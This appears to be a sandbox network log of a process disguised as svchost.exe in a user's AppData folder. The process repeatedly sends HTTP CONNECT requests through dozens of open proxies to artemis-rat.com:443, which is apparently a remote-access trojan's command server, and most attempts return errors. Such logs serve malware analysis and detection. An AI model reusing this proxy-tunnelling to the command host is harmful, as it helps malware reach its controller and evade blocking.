Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2902	192.168.2.5	59432	104.20.123.164	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.359411955 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.514008045 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:32 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2903	192.168.2.5	59433	172.67.3.98	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.362171888 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.516767979 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:32 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2904	192.168.2.5	59449	104.21.194.182	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.375895977 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.530092955 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:32 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2905	192.168.2.5	59444	74.48.7.43	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.376887083 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2906	192.168.2.5	59459	172.67.182.102	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.379353046 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.543199062 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:32 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2907	192.168.2.5	59418	43.131.246.77	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.385339975 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2908	192.168.2.5	57716	199.58.185.9	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.386471987 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2909	192.168.2.5	58741	125.227.225.157	3389	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.388889074 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2910	192.168.2.5	58739	189.240.60.166	9090	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.389663935 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.892648935 CET	72	IN	HTTP/1.1 200 Connection established Proxy-Agent: Fortinet-Proxy/1.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2911	192.168.2.5	58760	217.182.129.103	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.391449928 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.117271900 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2912	192.168.2.5	59471	172.67.181.85	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.391545057 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.557770967 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:32 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2913	192.168.2.5	59421	58.234.116.197	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.393605947 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2914	192.168.2.5	59455	103.152.112.167	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.396409988 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.570904016 CET	309	IN	HTTP/1.1 400 Bad Request Server: nginx/1.23.2 Date: Sat, 09 Mar 2024 12:14:32 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 33 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.23.2</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2915	192.168.2.5	58725	54.222.197.147	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.401619911 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.241228104 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:37 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2916	192.168.2.5	56032	103.97.179.115	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.426654100 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2917	192.168.2.5	59420	203.171.19.98	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.444011927 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2918	192.168.2.5	59423	80.67.8.6	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.512583971 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2919	192.168.2.5	59472	191.102.159.157	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.512597084 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.735568047 CET	1260	IN	HTTP/1.1 403 Forbidden Server: squid/6.0.0-20220501-re899e0c27 Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:32 GMT Content-Type: text/html;charset=utf-8 Content-Length: 3670 X-Squid-Error: ERR_ACCESS_DENIED 0 Vary: Accept-Language Content-Language: en Cache-Status: ezproxies.com Via: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27) Connection: keep-alive Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2022 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. // Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verdana, sans-seri

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2920	192.168.2.5	59481	45.196.151.120	5432	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.512928009 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.729805946 CET	308	IN	HTTP/1.1 407 Proxy Authentication Required Server: FaaS v1.3-20220203-7fa38bd5af Date: Sat, 09 Mar 2024 12:14:32 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 65 Proxy-Authenticate: Basic realm="Proxy" Connection: close Data Raw: 48 54 54 50 20 61 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 65 72 72 6f 72 3a 20 69 70 20 61 75 74 68 20 66 61 69 6c 65 64 2c 20 6e 6f 20 63 72 65 64 65 6e 74 69 61 6c 73 20 70 72 6f 76 69 64 65 64 Data Ascii: HTTP authorization error: ip auth failed, no credentials provided

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2921	192.168.2.5	59425	91.107.180.250	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.514600039 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2922	192.168.2.5	59419	115.74.157.191	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.514600039 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.380332947 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.548201084 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2923	192.168.2.5	59497	159.65.233.115	8000	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.518975019 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.743905067 CET	32	IN	HTTP/1.0 504 Gateway Timeout

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2924	192.168.2.5	59633	61.130.9.38	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.522556067 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2925	192.168.2.5	59524	185.162.231.226	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.523636103 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.677988052 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:32 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2926	192.168.2.5	59426	194.247.173.17	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.524498940 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2927	192.168.2.5	59634	61.130.9.38	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.525240898 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2928	192.168.2.5	59520	172.64.207.185	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.528736115 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
